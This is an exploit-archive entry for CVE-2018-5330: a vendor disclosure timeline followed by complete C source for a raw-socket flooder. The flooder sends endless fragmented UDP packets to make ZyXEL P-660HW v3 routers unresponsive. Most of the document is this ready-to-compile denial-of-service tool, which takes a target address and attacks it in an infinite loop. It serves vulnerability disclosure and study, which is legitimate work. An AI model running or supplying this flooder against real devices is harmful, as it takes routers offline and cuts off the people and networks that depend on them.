ZyXEL P-660HW UDP Denial Of Service

`################  
#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service  
CVE: CVE-2018-5330  
#CWE: CWE-400  
#Exploit Author: Hosein Askari   
#Vendor HomePage: https://www.zyxel.com/  
#Version : v3  
#Tested on: ZyXEL P-660HW  
#Category: Network Appliance  
#Author Mail : [email protected]  
#description: ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.  
#####################  
Vendor status:  
[02.01.2018] Vulnerability discovered  
[04.01.2018] CVE requestion  
[10.01.2018] CVE assigned  
[10.01.2018] Contact with the vendor  
[11.01.2018] Vendor responds asking for details  
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)  
[11.01.2018] Vendor assigns appropriate team for coordination  
[11.01.2018] Vendor is analyzing the issue  
[12.01.2018] Asked vendor for confirmation   
[12.01.2018] Vendor replies with confirmation of the issue  
#####################  
#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  
#include <unistd.h>  
#include <netdb.h>  
#include <netinet/udp.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#ifdef STRANGE_BSD_BYTE_ORDERING_THING  
#define change(n) (n)  
#else   
#define change(n) htons(n)  
#endif  
#define ip_1 8193   
#define head 153   
#define u_head 41   
#define level 0  
// Exploit Author : Hosein Askar  
u_long p_rec(u_char *);  
void running(u_char *);  
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);  
int main(int argc, char **argv)  
{  
  
int j = 1, i, socks, counter=1, number=1;  
u_long s_ip = 0;  
u_long d_ip = 0;  
u_short s_port = 0;  
u_short d_port = 0;  
if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)  
{  
perror("Error");  
exit(1);  
}  
if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)  
{  
perror("Error");  
exit(1);  
}  
  
if (argc < 2) running(argv[0]);  
if (!(d_ip = p_rec(argv[1])))  
{  
exit(1);  
}  
  
fprintf(stderr, "Attack is started \n");  
  
for (;;) {  
counter ++;  
s_ip = counter*10;  
s_port = counter*10;  
d_port = counter+1*10;  
if (counter>10)  
counter = 1;  
for (i = 0; i < 10; i++)  
{  
fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);  
}  
}  
return (0);  
}  
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)  
{  
u_char *p = NULL, *pointer = NULL;   
u_char byte;   
struct sockaddr_in sin;   
  
sin.sin_family = AF_INET;  
sin.sin_port = s_port;  
sin.sin_addr.s_addr = d_ip;  
  
p = (u_char *)malloc(head + u_head + level);  
pointer = p;  
  
byte = 69;   
memcpy(pointer, &byte, sizeof(u_char));  
pointer += 2;   
*((u_short *)pointer) = change(head + u_head + level);   
pointer += 2;  
*((u_short *)pointer) = htons(number);   
pointer += 2;  
*((u_short *)pointer) |= change(ip_1);   
pointer += 2;  
*((u_short *)pointer) = 247;   
byte = IPPROTO_UDP;  
memcpy(pointer + 1, &byte, sizeof(u_char));  
pointer += 4;   
*((u_long *)pointer) = s_ip;   
pointer += 4;  
*((u_long *)pointer) = d_ip;   
pointer += 4;  
*((u_short *)pointer) = htons(s_port);   
pointer += 2;  
*((u_short *)pointer) = htons(d_port);   
pointer += 2;  
*((u_short *)pointer) = htons(8);  
if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,  
sizeof(struct sockaddr)) == -1)  
{  
perror("\nsendto");  
free(p);  
exit(1);  
}  
free(p);  
}  
u_long p_rec(u_char *host_name)  
{  
struct in_addr addr;  
struct hostent *host_ent;  
  
if ((addr.s_addr = inet_addr(host_name)) == -1)  
{  
if (!(host_ent = gethostbyname(host_name))) return (0);  
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);  
}  
return (addr.s_addr);  
}  
void running(u_char *name)  
{  
fprintf(stderr,  
"%s d_ip\n",  
name);  
exit(0);  
}  
##########################  
  
  
`